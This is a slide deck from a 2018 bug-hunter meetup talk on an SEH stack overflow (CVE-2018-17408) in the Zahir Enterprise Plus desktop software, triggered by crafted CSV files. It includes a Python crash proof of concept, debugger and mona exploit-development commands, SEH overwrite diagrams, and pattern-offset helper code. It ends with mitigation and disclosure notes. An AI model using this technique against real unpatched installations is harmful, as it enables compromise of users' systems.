Blinded Stack Overflow Exploit:
Just Another Common Technique
Thomas Gregory | Director and Partner at PT Spentera
tom@spentera.id | @modpr0be
Indonesian Bug Hunter Lounge Meetup 2018
Who we are
• Marie Muhammad
  • Security researcher
  • Penetration tester and Red team operator
  • Bug hunter
  • Holds OSCP, OSCE, CRTE
  • marie@spentera.id
  • @f3ci
  • Found the 0day
• Thomas Gregory
  • Director and Partner at Spentera
  • Cybersecurity Consultant
  • Vulnerability Discovery and 0day Exploit Development
  • Vulnerability Assessment and Penetration Testing
  • Metasploit framework exploit developer
  • Holds OSCP, OSCE, ISO 27001:2013 LA
  • tom@spentera.id
  • @modpr0be
  • Just exploiting further
Agenda
What
Zahir Enterprise Plus 6.05
Why
How
Fuzzing: Identifying Entry point
• Zahir is a desktop client application, so one approach to identifying an entry point is file-format fuzzing.
• Identifying entry points:
  • Menu Buka Data, a function to read from a local database or a Firebird database.
  • Menu Membuka File Backup, a function to open an existing backup.
  • Menu Import Data dari Zahir versi 6.0, a menu to open data from the previous Zahir version.
  • Menu Import Data dari file lainnya, a menu to open data from a CSV-format file.
  • Menu Import Transaksi, a menu to open data from a CSV-format file.
Fuzzing: Accidentally crashed!
Simple code to crash
#!/usr/bin/python
junk = "A" * 2500
junk += '\r\n'  # this is the CR/LF
junk += 'A' * 500
junk += "D" * 500
print "[+] Preparing for file.."
filename = "junk.csv"
f = open(filename, 'wb')  # binary mode so the CR/LF is written exactly as given
print "[+] Writing crafted CSV file.."
f.write(junk)
f.close()
print "[+] File %s written successfully.. bring it to Mr. Zahir." % filename
Error and Crash
Exception Handler Kicked in
Replicate and Debug the app
Failed: anti-debug implemented
At this point
Modify the main program to bypass the anti-debug function
Catch and dump the crash info, then analyze the crash dump
Crash dump analysis
Catch the crash with procdump
mkdir c:\crashdump
cd C:\tools\SysinternalsSuite
rem -i installs ProcDump as the postmortem (AeDebug) debugger; -ma writes a full dump into C:\crashdump
procdump.exe -ma -i C:\crashdump
Analyze the crash with windbg
File – Open Crash Dump
Analyze the crash with windbg
0:000> d 0012ec30
0012ec30 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec40 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec50 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec60 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012eca0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0:000> !exchain
How SEH works
(1) Exception occurs ----------------------------+
                                                 |
(3) next SEH leads on to the next SE Handler ----|-----------------------+
                                                 |                       |
                                                 v                       v
+------------------------------+ +--------+ +----------+ +--------+ +----------+
|AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |Next SEH| |SE Handler|
+------------------------------+ +--------+ +----------+ +--------+ +----------+
         Junk / buffer               ^           |
                                     +-----------+
          (2) SE Handler leads back to the next SEH address
How SEH exploit works
(1) Exception occurs ----------------------------+
                                                 |
(3) next SEH leads on to the shellcode ----------|-----------------------+
                                                 |                       |
                                                 v                       v
+------------------------------+ +--------+ +----------+ +--------------------------------+
|AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |DDDDDDDDDDDDDDDDDDDDDDDDDDD....D|
+------------------------------+ +--------+ +----------+ +--------------------------------+
         Junk / buffer               ^           |                  Shellcode
                                     |           | POP REG
                                     |           | POP REG
                                     |           | RETN
                                     +-----------+ (2) POP POP RET leads back to next SEH
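To read the two diagrams from the crash-dump side, here is an added example (not code from the slides) that triages the `!exchain` listing WinDbg prints: a healthy record's SE Handler lives inside a loaded module, while an overwritten record's handler is whatever the file put there and the chain walk ends at an invalid next pointer. The `!exchain` text and the module range in `MODULES` are constructed for the example, not taken from the Zahir crash.

```python
import re

# Added example, not from the slides: triage of WinDbg's "!exchain" listing.
# SAMPLE_EXCHAIN and MODULES are constructed, not taken from the Zahir crash.
# Record 1 is a normal CRT handler inside MSVCRT; record 2 was overwritten by
# the file contents, so its handler field holds 0x44444444 ("DDDD") and the
# chain walk ends at an invalid "next" pointer.
SAMPLE_EXCHAIN = """\
0012fbd8: MSVCRT!_except_handler4+0 (77c35c2a)
0012ec00: 44444444
Invalid exception stack at 44444444
"""
MODULES = {"MSVCRT": (0x77C10000, 0x77C68000)}  # {name: (base, end)}, from "lm"

# "<record>: <symbol> (<handler>)" when the handler resolves to a module,
# "<record>: <handler>" when it does not (typical for an overwritten record).
RECORD_RE = re.compile(
    r"^(?P<rec>[0-9a-f]{8}): (?:(?P<sym>\S+) )?\(?(?P<handler>[0-9a-f]{8})\)?$",
    re.IGNORECASE)
INVALID_RE = re.compile(r"^Invalid exception stack at (?P<ptr>[0-9a-f]{8})$",
                        re.IGNORECASE)

def parse_exchain(text):
    """Return (records, invalid_next); each record is
    (record_addr, handler_addr, symbol_or_None), in chain order."""
    records, invalid = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = RECORD_RE.match(line)
        if m:
            records.append((int(m["rec"], 16), int(m["handler"], 16), m["sym"]))
            continue
        m = INVALID_RE.match(line)
        if m:
            invalid = int(m["ptr"], 16)
    return records, invalid

def module_for(addr):
    """Name of the loaded module that contains addr, or None."""
    for name, (base, end) in MODULES.items():
        if base <= addr < end:
            return name
    return None

def triage(text):
    """A healthy SE Handler points into a loaded module's code. A handler that
    sits in no module is the overwritten record of the slide's diagram: the
    buffer spilled over "Next SEH" and "SE Handler"."""
    records, invalid = parse_exchain(text)
    findings = ["record %08x: handler %08x is in no loaded module" % (rec, h)
                for rec, h, _ in records if module_for(h) is None]
    if invalid is not None:
        findings.append("chain ends at invalid next pointer %08x" % invalid)
    return findings
```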
Mona helps during the exploit development
# Load mona.py into WinDbg
0:000> .load pykd.pyd
# Same as Metasploit pattern_create.rb and pattern_offset.rb
0:000> !py mona pc
0:000> !py mona po <offset>
# Compare memory for bad characters
0:000> !py mona ba -cpb '\x00'
0:000> !py mona cmp -f bytearray.bin -a <start address>
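The cyclic pattern behind `!py mona pc` / `!py mona po` (and Metasploit's pattern_create.rb / pattern_offset.rb), as an added example that is not code from the slides: `pattern_create()` builds the Aa0Aa1... sequence that replaces the plain "A" filler, and `pattern_offset()` turns the DWORD WinDbg shows in EIP or in the overwritten SEH record back into a byte offset within the crafted file.

```python
import string
import struct

# Added example, not from the slides: the non-repeating pattern that
# pattern_create.rb and "!py mona pc" generate, and the offset lookup that
# pattern_offset.rb and "!py mona po" perform on a value read from the crash.


def pattern_create(length):
    """Build a cyclic pattern of `length` bytes: Aa0Aa1Aa2 ... Zz9 (20280 bytes
    before it repeats). Every 4-byte window is unique within that range."""
    parts = []
    total = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                parts.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(parts)[:length]
    return "".join(parts)[:length]


def pattern_offset(value, length=20280):
    """Return the offset of `value` in the pattern, or -1 if it is absent.

    `value` is either the text seen in memory (e.g. "Ab3A") or the 32-bit
    little-endian DWORD a debugger shows in EIP / in the SEH record, given as
    an int (0x41336241) or as a "0x..." string."""
    if isinstance(value, str) and value.lower().startswith("0x"):
        value = int(value, 16)
    if isinstance(value, int):
        # EIP = 0x41336241 means the bytes 41 62 33 41 ("Ab3A") were read
        # from the buffer, lowest address first.
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # Use a pattern of the same size as the "A" * 2500 filler in the crash
    # script, then feed back the value WinDbg shows after the crash.
    junk = pattern_create(2500)
    print(pattern_offset(0x41336241))  # 39: "Ab3A" sits 39 bytes into junk
```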
Exploit FTW!
Demo exploitation process..
Aftermath
• Mitigation
  • Don't process files with a CSV extension from untrusted parties.
  • Double check when trusted parties provide files with a CSV extension.
  • Always update the operating system and your endpoint security.
• Solution
  • There is no solution from Zahir at the moment.
• Vulnerability report
  • Zahir was contacted but gave no security-related response.
  • Submitted to the National Cyber Security Operation Center under the Indonesia National Cyber and Encryption Agency (BSSN).
  • Assigned CVE-2018-17408.
Thank you
Thomas Gregory
Director and Partner at PT Spentera
tom@spentera.id